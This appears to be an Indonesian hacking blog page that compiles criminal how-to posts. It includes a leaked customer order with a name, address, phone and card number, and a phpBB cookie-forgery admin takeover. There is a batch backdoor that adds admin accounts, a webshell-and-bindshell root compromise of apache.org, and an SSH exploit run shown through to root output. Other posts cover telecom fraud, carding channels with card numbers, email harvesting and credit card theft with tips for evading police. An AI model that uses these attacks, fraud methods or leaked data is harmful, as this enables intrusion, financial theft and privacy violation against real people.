Saturday, March 31, 2007

No. Kartu Kredit

Ini adalah salah satu contoh nomor kartu kredit yang saya (blog maker) dapat ambil dari salah satu database situs toko online.


BetterHealthChoices.com
(888)890-4744
--------------------------------------------------------------------------------

Order NO: CC-1211512
Date: 6/7/2003 12:47:38 PM

stipel711@1st.net

Shipping Info:
Susan Tippel
59308 Frankfort Road
Salesville, OH 43778
740 679-2328

Billing Info:
Susan Tippel
59308 Frankfort Road
Salesville, OH 43778
740 679-2328

--------------------------------------------------------------------------------

4418 5391 2112 2878
07/04

Defacing

Langkah-Langkah Deface PHPBB/PHPBB2 Loser_cs_20
1. Download browser Mozilla FireFox

2. Download pluginnya yg bernama LiveHTTPHeader
download di http://livehttpheaders.mozdev.org/installation.html
cari yg paling baru

3. selanjutnya cari target dengan Uncle Google dgn syntax :
phpBB site:[terserah apa aja]

4. setelah itu buka plugin yg kita download tadi di Tools -> LiveHTTPHeader

5. Ingat, isi LiveHTTPHeader harus kosong

6. buka situs target, dengan begitu LiveHTTPHeader akan mengambil semua cookie yg tercatat di halaman target

7. setelah halaman sukses terbuka ditandai dengan tanda "done" di bawah browser, langkah selanjutnya adalah mengklik LiveHTTPHeader di bagian tengahnya dilanjutkan mengklik opsi Replay..

8. setelah LiveHTTPReplay terbuka liat bagian seperti dibawah ini pada LiveHTTPReplay...

Cookie: phpbb2mysql_data=a%3A0%3A%7B%7D; phpbb2mysql_sid=88da2bbdc1a3a789df094d50d91f7e3b

9. Hapus bagian yg belakang setelah tanda semi colon (

Cookie: phpbb2mysql_data=a%3A0%3A%7B%7D; phpbb2mysql_sid=88da2bbdc1a3a789df094d50d91f7e3b

\_______________hapus bagian ini_________________/

jadinya akan seperti ini :

Cookie: phpbb2mysql_data=a%3A0%3A%7B%7D

10. lalu klik replay lagi, sehingga halaman target akan mereload semua perintah cookie yg telah kita manipulasi

11. selanjutnya perhatikan langkah di bawah ini:

Cookie: phpbb2mysql_data=a%3A0%3A%7B%7D
\________hapus bagian ini dan di ganti dengan:

Cookie: phpbb2mysql_data=a:2{s:11:"autologinid";s:32:"602baahpepms74d4cb6f2d012e1e4019";s:6:"userid";s:1:"2";}

12. lalu klik replay lagi, sehingga halaman target akan mereload semua perintah cookie yg telah kita manipulasi tadi.

13. perhatikan lagi langkah ini:

Cookie: phpbb2mysql_data=a:2:{s:11:"autologinid";s:32:"602baahpepms74d4cb6f2d012e1e4019";s:6:"userid";s:1:"2";}
\___________________________bagian ini jg digantilagi_______________________________/

menjadi seperti ini:

Cookie: phpbb2mysql_data=a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb%3A1%3Bs%3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B%7D

14. lalu klik replay lagi, sehingga halaman target akan mereload semua perintah cookie yg telah kita manipulasi tadi.

15. selesai, silakan liat halaman target, kalo anda beruntung anda mendapatkan full admin.
Silakan pergi ke bawah halaman dan lihat opsi "Go To Administration Panel" telah muncul

Echo Backdoor

rem *echobackd00r.bat
rem *Maret 2004 - backd00r untuk XP && 2000
rem *dibuat untuk mempermudah menciptakan account admin
rem *Kombinasikan dengan SPLOITS untuk mendapatkan Account admin ex: kaht2
rem *atau masuk ke pc yang masih default dengan disket :P baca eksploits lokal


rem *MULAI.

@echo off
PROMPT $P$G
cls
Color 87
GOto iklan

:setting

rem *ganti USER dan PASS

set USER="backdoor"
set PASS="password"

if %USER%=="backdoor" Goto gagal else GOto proses

:proses

rem *masuk ke perintah tuk nambahin user + passwordnya

net user %USER% %PASS% /add
net localgroup Administrators %USER% /add
net localgroup Users %USER% /delete

cls
echo.
echo Account %USER% dengan password %PASS% telah berhasil di buat!
color 70


EXIT

:iklan

rem * just a banner from me :) , bisa di hilangkan :p

echo.
echo ###############################################################
echo # #
echo # Echobackd00r #
echo # created && tested by y3dips with XP OS #
echo # greetz to :the_day for idea, moby, z3r0byt3,comex, *PUJI #
echo # note: ubah USER dan PASS #
echo # #
echo ###############################################################
echo.
echo tekan ENTER !!!
pause>nul

Goto setting

:gagal

echo.
echo edit file echobackd00r.bat dan ubah USER dan PASSnya
echo.


rem *SELESAI.
rem *created by y3dips : maret 2004 : http://echo.or.id

How To Deface APACHE

/*
* Before you start reading
*/
This paper does _not_ uncover any new vulnerabilities. It points out common
(and slightly less common) configuration errors, which even the people at
apache.org made. This is a general warning. Learn from it. Fix your systems,
so we won't have to :)

/*
* introduction
*/
This paper describes how, over the course of a week, we succeeded in
getting root access to the machine running www.apache.org, and changed
the main page to show a 'Powered by Microsoft BackOffice' logo instead
of the default 'Powered by Apache' logo (the feather). No other changes
were made, except to prevent other (possibly malicious) people getting in.

Note that the problems described in this paper are not apache-related,
these were all config errors (one of 'm straight from BugZilla's README,
but the README had enough warnings so I don't blame the BugZilla developers).
People running apache httpd do not need to start worrying because of
anything uncovered herein.

We hacked www.apache.org because there are a lot of servers running apache
software and if www.apache.org got compromised, somebody could backdoor
the apache server source and end up having lots of owned boxes.

We just couldn't allow this to happen, we secured the main ftproot==wwwroot
thing. While having owned root we just couldnt stand the urge to put that
small logo on it.

/*
* ftproot == wwwroot
* o+w dirs
*/
While searching for the laters apache httpserver to diff it the with
previous version and read that diff file for any options of new buffer
overflows, we got ourselves to ftp://ftp.apache.org. We found a mapping of
the http://www.apache.org on that ftp including world writable directories.

So we wrote a little wuh.php3 including
passthru($cmd);
?>

and uploaded that to one of the world writable directories.


/*
* Our commands executed
*/
Unsurprisingly, 'id' got executed when called like

http://www.apache.org/thatdir/wuh.php3?cmd=id

Next was to upload some bindshell and compile it like calling
http://www.apache.org/thatdir/wuh.php3?cmd=gcc+-o+httpd+httpd.c and then
executing it like calling http://www.apache.org/thatdir/wuh.php3?cmd=./httpd


/*
* The shell
*/
Ofcourse we used a bindshell that first requires ppl to authenticate with
a hardcoded password (:

Now we telnet to port 65533 where we binded that shell and we have local
nobody access, because cgi is running as user nobody.


/*
* The apache.org box
*/
What did we find on apache.org box:
-o=rx /root
-o=rx homedirs

apache.org is a freebsd 3.4 box. We didn't wanted to use any buffer
overflow or some lame exploit, goal was to reach root with only
configuration faults.


/*
* Mysql
*/
After a long search we found out that mysql was
running as user root and was reachable locally. Because apache.org was
running bugzilla which requires a mysql account and has it
username/password plaintext in the bugzilla source it was easy to
get a username/passwd for the mysql database.

We downloaded nportredird and have it set up to accept connections on
port 23306 from our ips and redir them to localhost port 3306 so we could
use our own mysql clients.


/*
* Full mysql access
* use it to create files
*/
Having gained access to port 3306 coming from localhost, using the login
'bugs' (which had full access [as in "all Y's"]), our privs where
elevated substantially. This was mostly due to sloppy reading of the BugZilla
README which _does_ show a quick way to set things up (with all Y's) but
also has lots of security warnings, including "don't run mysqld as root".

Using 'SELECT ... INTO OUTFILE;' we were now able to create files
anywhere, as root. These files were mode 666, and we could not overwrite
anything. Still, this seemed useful.

But what do you do with this ability? No use writing .rhosts files - no
sane rshd will accept a world-writable .rhosts file. Besides, rshd
wasn't running on this box.


/*
* our /root/.tcshrc
*/
Therefore, we decided to perform a trojan-like trick. We used database
'test' and created a one-column table with a 80char textfield. A couple
of inserts and one select later, we had ourselves a /root/.tcshrc with
contents similar to:
#!/bin/sh
cp /bin/sh /tmp/.rootsh
chmod 4755 /tmp/.rootsh
rm -f /root/.tcshrc


/*
* ROOT!!
*/
Quite trivial. Now the wait was for somebody to su -. Luckily, with 9
people legally having root, this didn't take long. The rest is trivial
too - being root the deface was quickly done, but not until after a
short report listing the vulnerabilities and quick fixes was build.
Shortly after the deface, we sent this report to one of the admins.


/*
* Fix that ftproot==wwwroot
*/
Another thing we did before the deface, was creating a file 'ftproot' in
the wwwroot (which was also ftproot), moving 'dist' to 'ftproot/dist'
and changing the ftproot to this new 'ftproot' dir, yielding the
world-writable dirs unexploitable but allowing ftp URLs to continue
working.


/*
* What could have been compromised?
*/
Remember the trojaned tcp_wrappers on ftp.win.tue.nl last year? If we
wanted to, we could have done the same thing to Apache. Edit the source
and have people download trojaned versions. Scary, eh?


/*
* In short:
*/
- ftproot==webroot, worldwritable dirs allowing us to upload and execute
php3 scripts
- mysqld running as root, with a FFULL RIGHTS login without a password.


/*
* Compliments for the Apache admin team
*/
We would like to compliment the Apache admin team on their swift
response when they found out about the deface, and also on their
approach, even calling us 'white hats' (we were at the most 'grey hats'
here, if you ask us).

BUG SMS Satelindo

Teknologi SMS sekarang ini memang makin marak terlebih lagi dengan keadaan ekonomi yang Berantakan, solusi smslah yang lebih tepat dibanding menelpon yang sangat merobek kantong.

GSM yang menggunakan teknik switching dengan memanfaatkan system base station memungkinkan kita bisa mengirim pesan alphanumeric singkat dari sebuah Handphone ke handphone lain.

oke sampe disini preambule kita akhiri.

Kenapa dengan sms gratis yang dulu pernah populer sekarang telah susah ditemui?, itu pertanyaan yang sangat lazim terlontar dari pikiran kita semua yang mengandalkan sebuah promosi produk yang akhirnya menjadi komersil.

Bug yang saya dapatkan pada akhir bulan ini yaitu sebuah sms gratis dengan memanfaatkan kelemahan pada SATELINDO GSM. kenapa satelindo? nomor yang di keluarkan pihat SATELINDO yang baru dengan nomor seri depan 163***(misal +6281616378**) mempunyai bug yang dapat bermanfaat bagi kita untuk ber SMS gratis dengan sipengguna. Telah dicoba dari Simpati, mentari, proXL, dll tetap bisa dilakukan secara gratis.

cara sebagai berikut:

1. ketik SMS
2. kirim kenomor yang dituju ( misal: +6281616378** - tanpa bintang)
(yang saya dapatkan yaitu buug mentari versi 6163 <- diambil dari kode kartu dan nomor awal dari kartu mentari tersebut)
3. cara tulis nomor yang dituju menjadi 616378** (coba dgn nomor lain bila perlu)
4. tidak menggunakan karakter apapun yang ditambah pada nomor tujuan (karakter bintang hanya untuk menutupi nomor asli yang dituju.
4. dapat kita liat bahwa sms kita terkirim.
5. finish

Dari sana kita bisa lakukan dengan sepuas hati.

Tip n Trik Telepon Gratis

I. Trik telphon gratis Lokal (dalam kota)

Fasilitas dan cara yang digunakan:
1. Telphone umum koin yang masih hidup
2. Pencet angka 1551 <--- catatan: angka 1 terakhir di pencet lama hingga ada nada "tut/nit/nada sela lainnya"
3. Bila tanda itu telah bunyi baru tekan nomor yang dituju ( nomor telphone lokal)
4. dan anda akan mendapatkan sambungan langsung dari telkom ke no telp yang dituju, maka anda bisa bicara sepuas bibir anda.

Note: Untuk nomor lokal yang tidak bisa dihubungi biasanya dikarenakan :
1. TERLALU BANYAK NOMOR YANG KEMBAR
2. TERLALU BANYAK ANGKA DOMINAN BESAR MISAL 8997896/89868789/ dll
3. DAN BILA TELEPHONE YANG DITUJU BELUM TERPASANG
4. TELKOM SEDANG KENA TROUBLE :))

II. TRIK TELEPHONE GRATIS INTERLOKAL (LUAR KOTA)

Fasilitas dan cara yang digunakan:
1. Telphone rumah, kantor atau wartel tipe B (sangat dianjurkan)
2. Telponlah seperti kita menelpon biasa ke NOMOR TUJUAN LUAR KOTA (khusus luar kota)
3. Bicaralah sepuas hati dan sebengkak bibir anda
4. Bila telah selesai percakapan ... PERHATIKAN TRIK INI:

TRIK 1. - SEBELUM ANDA MENUTUP TELEPHON, KETIKLAH NOMOR TUJUAN PERSIS SEPERTI NOMOR YANG DITUJU PERTAMA
misal: tujuan 021888555000 -> bila telah selesai ketikan 021888555000 lagi
JANGAN PAKAI TOMBOL RADIAL, KARENA SERING GAGAL

TRIK 2. - SEPERTI CARA TRIK PERTAMA TADI CUMAN KITA RUBAH NOMOR TUJUAN AKHIR
misal: tujuan 021888555000 -> bila telah selesai ketikan 031545552222 (BEDA NOMOR TUJUAN)
JANGAN PAKAI TOMBOL RADIAL, KARENA SERING GAGAL


CATATAN: Hati-hati dalam melakukan aksi ini karena sangat merugikan pihak lain. Jangan sekali-kali gunakan wartel tipe A untuk melakukan trik II telepon gratis keluar kotak karena akan kelihatan pada komputer billing operator dan pasti Anda akan dicurigai karena pulsa akan hilang begitu saja dari layar monitor operator Wartel. Jangan menggunakan trik ini kanare akan merugikan "pihak lain" =))

Cara Cepat Bongkar Password

Ada cara cepat menerobos password windows ( termasuk jaringan windows ) saat anda lupa yakni menngunakan @stake LC4 (dulunya bernama L0pht Crack).
LC4 sanggup melawan mesin windows anda dengan sebuah kombinasi dari kamus dan serangan brutal orang2 usil.LC4 bisa mengcrack hampir semua password dalam hitungan detik saja.bahkan pada password yang terdiri dari angka dan karakter2 panjang.
Seperti diketahui Password windows Nt,2000,dan juga XP disimpan menggunakan sandi (encrypt) hash marks.LC4 sanggup membongkar hash marks tersebut dengan proses kerja ratusan password per menitnya.selanjtnya,password yang tepat akan dikirim dan ditampilkan ke layar monitor
Dalam sebuah perusahaan,LC4 bisa digunakan untuk mengakses PC karyawan.ia bisa digunakan untuk mengakses komputer dari user-user yang lupa dengan password-nya.maksudnya,System Administrators jaringan bisa mencari password yang lemah dalam beberapa menit.bahkan juga,sys admins bisa merubah password tersebut agar lebih aman
Kejelekan program pembongkar password ini,seseorang yang usil bisa menggunakan LC4 ini untuk mencium (Mengawasi) password2 dari user sebuah jaringan.bahkan,seorang hacker bisa memasang aplikasi primary domain controller dan menjegal ratusan password berharga hanya dalam hitungan menit.
Info dan Download Program LC4beserta versi evaluasi ini bisa diambil http://www.atstake.com/research/lc/

LINUX

Unix yang seluruh source codenya dibuat dengan bahasa C sangat memudahkan
pengembanganya sehingga dalam waktu singkat Unix dapat berkembang secara
pesat, dan terbentuklah dua aliran : yaitu Unix yang dikembangkan oleh
Universitas Berkeley dan yang dikembangkan AT&T.

Semakin lama semakin banyak perusahaan yang ikut melibatkan diri, sehingga
terjadilah persaingan antar perusahaan untuk memegang kontrol terhadap
sistem operasi.PErsaingan ini menyebabkan perlunya sebuah standar yang baku
sehingga lahirlah proyek bernama 'POSIX' yang di motori oleh IEEE (The
Institute of Electrical and Electronics Engineers) yang akan menetapkan
spesifikasi standar Unix. ternyata, dengan adanya standar tersebut tetap
belum bisa meredakan persaingan yang timbul yang mengakibatkan munculnya
berbagai varian dari Unix.

Source code Minix yang tercipta sebagai salah satu varian Unix dan dibuat
oleh Andy S Tanembaum untuk tujuan pendidikan inilah yang dijadikan Linus
Torvalds sebagai referensi untuk membuat suatu Opeating system yang dapat
bekerja seperti Unix dalam komputer 386. Dalam pembuatan linux , Linus
memakai tool-tool dari Free Software Foundation yang berlicensi GNU. Agar
sistem operasi yang baru dibuatnya utuh , linus juga menambahkan program-
program yang berlicensi GNU. Linux yang dibuat linus sebagai hobi akhirnya
membuahkan versi pertama linux, yaitu linux versi 0.0.1, setelah mengalami
perbaikan pada versi 0.02 dan merupakan linux resmi pertama yang diumumkan
secara luas kepada publik. pada tanggal 5 Oktober 1991 linus menggumumkan
source codenya.

Linux yang pertama dirilis sudahdapat menjalankan shell bash,GNU C compiler
, GNU make, GNU Sed, Compress dll. Proyek linux ini menyita begitu banyak
perhatian seluruh programer di dunia yang akhirnya berpartisipasi untuk
ikut mengembangkan linux.

'Linux' bisa jadi merupakan proyek para hacker yang sangat berharga di
dalam sejarah - serta didistribusikan secara bebas beserta kode sumbernya
keseluruh dunia.

Senjata Seorang Carder

Tentu kalian udah nggak asing lagi dengan istilah yang satu ini,carder adalah istilah yang diberikan oleh hacker sejati untuk pencuri kartu kredit. Kali ini kita akan bahas soal carder ini.

Tapi ingat!!! yang aku tulis ini,hanya bersifat ilmu pengetahuan.aku tidak bertanggung jawab jika kalian berurusan dengan pihak kepolisian. Aku sarankan jika kalian mendapat cc jangan beli barang.

Mari kita mulai......

1.masuk ke MIRC
dari MIRC kalian join ke channel ini :

#CCPOSTS
#THACC (Dulu namanya #thecc)

sebenarnya masih banyak channel yang lainnya tapi aku kasih dua aja yaa!!

2.setelah join ke #ccpost kamu ketik perintah !commands dan kemudian akan muncul di layar perintah perintah yang bisa kamu gunakan.

3.!chk cc number valid /!chk 1234567890 1202 untuk mengetahui kartu tsb bisa di gunakan atau tidak.

4.!cvv2 cc number/ !cvv2 1234567890 untuk mengetahui nomor identitas kartu tsb (card ID)

5.!proxy
untuk mengetahui nomor proxy dan port yang bisa kamu gunakan untuk mengelabui ISP.

6.!order.log
untuk mengetahui nama,alamat dan cc number seseorang.

ini nih cuplikannya :

#ccposts

*** Now talking in #ccposts

*** Topic is '..:: Welcome To #CCPOSTS | !Chk [OFF] !Commands [ON] !Cvv2 [ON] | Also Idle In #Dont.whois.me.bitch and get Aop | +o/+v Verify First| /server xdirc.d2g.com -> Free BNC: /server portatech.net 21500 xdirc'

*** Set by ^XDIrc^ on Thu May 09 02:04:28
-CCard-Chk-Bot- Tired Of Using Dallnet FFoor Checking CC's ? Try X-Niatites 5.01 -- http://mi5.ausgamers.com/xns501.exe (Win ME untested & 24 Valid CC's Included) !cvv2 5437000105070603 !commands

*** Quits: MIHUTESCU (~mihut@80.97.26.67) (Client closed connection) Er0sake` , < 5437000105070603 > is Master > cvv2 : -> 074 <-, by : SL[a]TkiS , #DaCc
-listen2rap- SL[a]TkiS's command llist iiss as following: !country Country-Name, !state State-Name, !bank cc-Number, !bnc, !order.log, !cardable, !proxy, !unicode, !cvv2 ccNumber - -=. SL[a]TkiS addon version 4.0, get it at www.sthost4u.net/Programs/slatkis_addon_4.0.zip , #DaCc =- <@^Enhance^> ?? Request ?? Info?Auth.net Merchant Account - I have Virgins / Cvv2 / eBay Seller Accounts / Proxy / XXX / Cardable Sites / High Limit CCs -- I Ver. First. NewBs & Ripperz Piss Off? ? ?׿? ?

*** Joins: ^tyty^ (BaCk0ff@max227.idx.com.au)

*** Quits: ^tyty^ (BaCk0ff@max227.idx.com.au) (Quit: )

* DaLinuX i have root i need cc msg me for trade
!chk 373216942923005 0802


#thacc
*** Now talking in #thacc
*** Topic is 'We are not responsible for any actions that non-op's perform or any actions against DALnet policy that may done at the main chan}}[Type: !commands ] ||GSD's site: www.TheCC.biz || [ Join #CCpower ] [new command by GSD > !phone < only when MR^all' is here] y2y = GSD'
*** Set by GSD on Fri May 03 02:11:11
!proxy
*** Parts: fc4 (~umik_o@203.147.50.12)
*** Joins: fc4 (~umik_o@203.147.50.12)
<^Enhance^> ?? Request ?? Info?Auth.net Merchant Account - I have Virgins / Cvv2 / eBay Seller Accounts / Proxy / XXX / Cardable Sites / High Limit CCs -- I Ver. First. NewBs & Ripperz Piss Off? ? ?׿? ?
*** Quits: ALICE22 (kozxgy@189.Red-80-34-233.pooles.rima-tde.net) (Quit: IRcap 7.1 http://www.ircap.net !)
*** Quits: ^tyty^ (BaCk0ff@max227.idx.com.au) (Quit: ) !xlogin 373216942923005 0802
*** e_KiNGHT-[Away] is now known as Guest53360
How I can see my card is valid
* DaLinuX i have root i need cc msg me for trade


Jelas ??!
Sekedar saran aja, pakai alamat rumah kontrakan/kost, jadi setelah barang yang didapat sampai, segera kabur dari rumah tersebut, hheeeehe, biar gak dilacak

Root Attack

lebih lanjut...
1. download scanning http://xvak-1.150m.com/tool/grabbb-0.1.0.tar.gz
2. tar -zxvf grabbb-0.1.0.tar.gz dan make , maka akan kmu dapati file grabbb.
3. cara penggunaan grabbb :
a. ketik ./grabbb maka akan ada help nya
b. klo saya biasanya ./grabbb -a xxx.xxx.xxx.0 -b xxx.xxx.xxx.255 port <== port disini
terserah kmu mau berapa, bisa 21, 22, 23, 443, 80, 8080
- klo kita scan port 21 maka akan keliatan versi wuftpd
- klo kita scan port 22 maka akan keliatan versi ssh
- klo kita scan port 443 maka akan keliatan versi openssl

berikut contoh ssh:
66.1.198.210:22: SSH-1.99-OpenSSH_2.5.2p2
66.1.205.138:22: SSH-1.99-OpenSSH_2.9p2
66.1.213.59:22: SSH-1.5-1.2.27
66.1.214.123:22: SSH-1.99-OpenSSH_2.9p2
66.1.217.77:22: SSH-1.5-1.2.25

setelah kita tau ssh yang dipake, tinggal menjalankan exploitnya

4. download x2, x3, x4 dst tergantung kmu mau pake yang mana, pake semua juga bisa
sebagai contoh pemakaian saya pake x3.tar.gz
5. ./x3 -t 0
SSHD deattack exploit. By Dvorak with Code from teso (http://www.team-teso.net)
Targets:
( 1) Small - SSH-1.5-1.2.26
( 2) Small - SSH-1.5-OpenSSH-1.2.3
( 3) Small - SSH-1.5-1.2.31
( 4) Small - SSH-1.5-1.3.07
( 5) Small - SSH-1.99-OpenSSH_2.1.1
( 6) Small - SSH-1.5-1.3.6_F-SECURE_SSH
( 7) Small - SSH-1.5-1.2.27
( 8) Small - SSH-1.99-OpenSSH_2.2.0p1
( 9) Big - SSH-1.99-OpenSSH_2.2.0p1
(10) Big - SSH-1.5-1.2.27
(11) Small - SSH-1.99-OpenSSH_2.2.0p1 -TEST
(12) Big - SSH-1.5-1.2.27

6. klo kita liat hasil dari grabbb, maka kita mendapat satu ip yaitu
66.1.213.59:22: SSH-1.5-1.2.27

7. kita coba ./x3 -t 7 66.1.213.59 22 .
SSHD deattack exploit. By Dvorak with Code from teso (http://www.team-teso.net)

Target: Small - SSH-1.99-OpenSSH_2.2.0p1

Attacking: 66.1.213.59:22
Testing if remote sshd is vulnerable # ATTACH NOW

YES #
Finding h - buf distance (estimate)
(1 ) testing 0x00000004 # SEGV #
(2 ) testing 0x0000c804 # FOUND #
Found buffer, determining exact diff
Finding h - buf distance using the teso method
(3 ) binary-search: h: 0x083fb7fc, slider: 0x00008000 # SEGV #
(4 ) binary-search: h: 0x083f77fc, slider: 0x00004000 # SURVIVED
(5 ) binary-search: h: 0x083f97fc, slider: 0x00002000 # SURVIVED #
(6 ) binary-search: h: 0x083fa7fc, slider: 0x00001000 # SURVIVED #
(7 ) binary-search: h: 0x083faffc, slider: 0x00000800 # SEGV #
(8 ) binary-search: h: 0x083fabfc, slider: 0x00000400 # SURVIVED #
(9 ) binary-search: h: 0x083fadfc, slider: 0x00000200 # SEGV #
(10) binary-search: h: 0x083facfc, slider: 0x00000100 # SEGV #
(11) binary-search: h: 0x083fac7c, slider: 0x00000080 # SURVIVED #
(12) binary-search: h: 0x083facbc, slider: 0x00000040 # SURVIVED #
(13) binary-search: h: 0x083facdc, slider: 0x00000020 # SURVIVED #
Bin search done, testing result
Finding exact h - buf distance
(16) trying: 0x083facdc # SURVIVED #
Exact match found at: 0x00005324
Looking for exact buffer address
Finding exact buffer address
(17) Trying: 0x080c5324 # SEGV #
(18) Trying: 0x080c6324 # SEGV #
(19) Trying: 0x080c7324 # SEGV #
(20) Trying: 0x080c8324 # SEGV #
(21) Trying: 0x0810e324 # SURVIVED #
(22 Trying: 0x08088634 # OK #
Finding distance till stack buffer

Crash, finding next return address
EX: buf: 0x0807420c h: 0x0806f000 ret-dist: 0xb7f8ba02
ATTACH NOW
Changing MSW of return address to: 0x0807
Crash, finding next return address
EX: buf: 0x0807420c h: 0x0806f000 ret-dist: 0xb7f8ba02
ATTACH NOW
Changing MSW of return address to: 0x0807
Crash, finding next return address
EX: buf: 0x0807420c h: 0x0806f000 ret-dist: 0xb7f8ba02
ATTACH NOW
Changing MSW of return address to: 0x0807
Crash, finding next return address
EX: buf: 0x0807420c h: 0x0806f000 ret-dist: 0xb7f8ba02
ATTACH NOW
Changing MSW of return address to: 0x0807


********* YOU ARE IN *********

uname -a ; id
uname -a ; id
Linux chander.com.tw 2.4.18-3 #1 Thu Apr 18 07:31:07 EDT 2002 i586 unknown
uid=48(root) gid=48(root) groups=48(root)

nah itu uah dapat, terserah mau diapakan

keterangan:
ngeroot menggunakan exploit ini sangatlah memakan waktu, saya menyarankan utk memakai scan massal, bisa memakai massplo.tar.gz atau massrooter.tar.gz sama saja.

tapi yang terpenting disini kita tau bagaimana cara mencari dia memakai ssh versi berapa, wuftp versi berapa, dan yang lain-lain

Cara Mendapatkan Puluhan Ribu Email

A. Gunakan software Mailcrawl (notworksolution.com) Versi gratisnya bisa menyimpan 3.000 email sekali pencarian, bisa diakali sampai bisa menyimpan 15.000 email/keyword.

Cara menggunakan :
1. Pada quick start wizard click using target searching kemudian masukkan keyword khas Indonesia
(keluarga, uang, wanita, sukses, pertanian, militer)
2. Option :
a. thread pilih 60-80
b. email parsing: klik only extract email with these extension/domain lalu isi .com .net .id c. pada ignore email with these username isi dengan daftar kata di bawah : (copy saja)
abuse info consult notice privacy support spam nospam sales bugtraq listserv subscribe unsubscribe
majordomo reply bounce mail nama domain daemon www news xxx 20 3d file main webadmin webmaster
admin owner promaster postmaster hostmaster manajerhosting tuanweb webhosting daftar register billing
customercare customerservice cs feedback komentar manager namaanda name username yourname
support technical service cs prohosting zzz info support technical request join berhenti
anggota menu index help file artikel d. automatic saving pilih angka 1.000 e. Start --- beri nama folder tempat penyimpanan hasil sesuai dengan nama keyword f. Jika angka email valid belum mencapai 1,000 sedangkan panel pencarian telah mendekati batas akhir,
lakukan stop kemudian tambahkan keyword baru tanpa harus mereset lagi. Sebaiknya nama folder
penyimpanan gabungan keyword
g. Jika angka email valid telah mendekati angka 3.000 sementara panel pencarian masih jauh dari batas
akhir. Lakukan stop lalu start kemudian beri nama baru folder hasil pencarian, sebaiknya keyword1,
keyword2 dst.

3. Jika telah dilakukan pengumpulan dengan banyak keyword, pasti ada email ganda.
Untuk mendapatkan daftar email tunggal gunakan software Listawy (mewsoft.com). Sofware ini selain bisa
merge, removal email juga mensplit seluruh email menurut jumlah file atau jumlah email/per file

Cara Carding

Semenjak dipopulerkannya sistem kartu kredit sekitar tahun 70-an dulu,
semakin banyak orang yang menggunakan sistem pembayaran kartu kredit sebab
kartu kredit dianggap lebih praktis untuk dibawa-bawa dan lebih mudah
sebab sistem pembayarannya adalah online. Di Amerika, Kanada dan
negara-negara Eropa, kartu kredit adalah hal yang sangat lumrah digunakan,
bahkan oleh para pelajar SMA sekalipun. Di Indonesia, biar bagaimanapun,
kartu kredit masih dipandang sebagai simbol status. Dulu saya ingat di
waktu saya masih SMA di Lampung ada teman yang punya kartu kredit dan tiap
hari diporotin oleh anak-anak. Beberapa tahun belakangan, dengan makin
ramainya 'online business' di Indonesia, semakin meluaslah pemakaian kartu
kredit sebagai sistem pembayaran, terutama di kota-kota metropolitan
seperti Jakarta, Medan dan Surabaya.

Bagaimana kartu kredit bisa jatuh ke tangan orang lain.
=======================================================

Pada prinsipnya, sang kartu sendiri (plastik) sangat jarang didapatkan.
Hal ini sebab orang beranggapan, jika kartu kreditnya disimpan di lemari
dan hanya dikeluarkan pada saat ingin digunakan, maka akan sangat susah
untuk menyalah gunakan kartu tsb. Ini adalah kesalahan yang cukup besar.
Pada pokoknya, jika kamu ingin melakukan kejahatan penyalahgunaan kartu
kredit, yang diperlukan adalah *nomor* kartu tersebut, beserta nama
pemiliknya (banyak juga bisnis yang meminta tanggal kadaluwarsa, namun di
Internet, biasanya kamu bisa lolos menggunakan nomor dan nama saja,
asalkan tanggal kadaluwarsa diisi (dikarang-karang) paling tidak enam
bulan didepan).
Bagaimana caranya memperoleh nomor-nomor kartu kredit ini ??? Di
negara-negara dimana kartu kredit digunakan secara meluas, untuk
mendapatkan nomor kartu kredit, biasanya tidak memerlukan ketrampilan
khusus. Kamu bisa iseng ngaduk-ngaduk tempat sampah toko grosir atau bisa
coba kerja di pom bensin, dan mendapatkan bon kartu kredit pelanggan. Di
Indonesia, hal ini semakin mungkin dilakukan, terutama di pasar-pasar
swalayan besar seperti Sogo, segitiga Senen, M Plaza, dll. Biasanya bon
penerimaan berupa kertas berwarna yang mencantumkan nama, nomor kartu
kredit, berapa total harga, dan seterusnya. Jika kamu seorang perempuan,
itu lebih bagus lagi. Cari kerjaan sebagai kasir dan sempatkan diri untuk
menyalin nomor-nomor tersebut. Perempuan juga jarang dicurigai ;-).
Mengaduk-ngaduk tempat sampah juga bisa berguna, sebab selain bisa
mendapatkan salinan bon, jika kamu ngaduk-ngaduk tempat sampah di dekat
bangunan ISP, kamu juga bisa mendapatkan password/login, dll (lihat
artikel 'Trashing dan Social Engineering').
Metode mutakhir yang sekarang banyak digunakan di negara-negara maju
adalah dengan cara menggunakan perangkat 'surveillance' untuk mendapatkan
nomor kartu kredit calon korban. Tentu saja jika kamu berhasil
mendapatkan akses ke database milik ISP atau Web komersil, kamu bisa
memanen ratusan bahkan ribuan nomor kartu kredit dari situ.

Sudah dapat kartunya, lalu?
===========================

Umumnya, para kriminil tingkat kecil-kecilan yang berhasil mendapat nomor
kartu kredit milik orang lain menggunakannya untuk kebutuhan pribadi. Hal
ini masih agak sulit dilakukan di Indonesia sebab masih jarang bisnis
komersil yang bersedia menerima pembayaran kartu kredit tanpa mengecek
detailnya. Di Kanada sini, cara yang banyak dipraktekkan adalah sbb:

- temukan rumah kosong / yang lagi ditinggalkan penghuninya untuk jangka
waktu yang lama
- buka katalog-katalog barang-barang menarik yang diinginkan
- telepon sang penjual, bayar dengan kartu kredit tsb (perlu tgl
kadaluwarsa, dan biasanya alamat sang empunya kartu).
- minta diantarkan ke alamat rumah kosong tadi (atau, lebih bagus lagi,
kamar hotel), dan minta 'express delivery' (hari berikutnya)
karang alasan seperti: perlu mendadak untuk presentasi lusa, atau
tetek bengek lainnya. gunakan social engineering.
- tunggu kedatangan barangnya.
- ambil barangnya, dan ... CABUT!

Dengan cara ini kadang-kadang para kriminil (umumnya anak ABG) bisa
mendapatkan laptop Tilamook terbaru bernilai $5000. Sang pemilik kartu
sendiri pada saat mengetahui bahwa kartunya telah disalah gunakan tidak
akan dikenakan biaya apa-apa, selain mungkin administrasi pengurusan
kasus, yang nilainya tidak sampai $50.
Dengan makin maraknya servis internet, semakin banyak pula kriminil yang
men(yalah)gunakan kartu kredit curian untuk mendapatkan servis gratis.
Karena komputer itu bodoh, kamu bisa dengan gampangnya mengaku sebagai
pemilik yang sah. Biasanya dengan mengisi 'form' di webpage, kamu bisa
registrasi untuk layanan tsb (kalau tidak salah d-net sudah punya
fasilitas ini, melalui diffy.com-nya, tapi kurang pasti) atau bisa untuk
mengorder sesuatu. Di Indonesia, yang paling sering digunakan oleh para
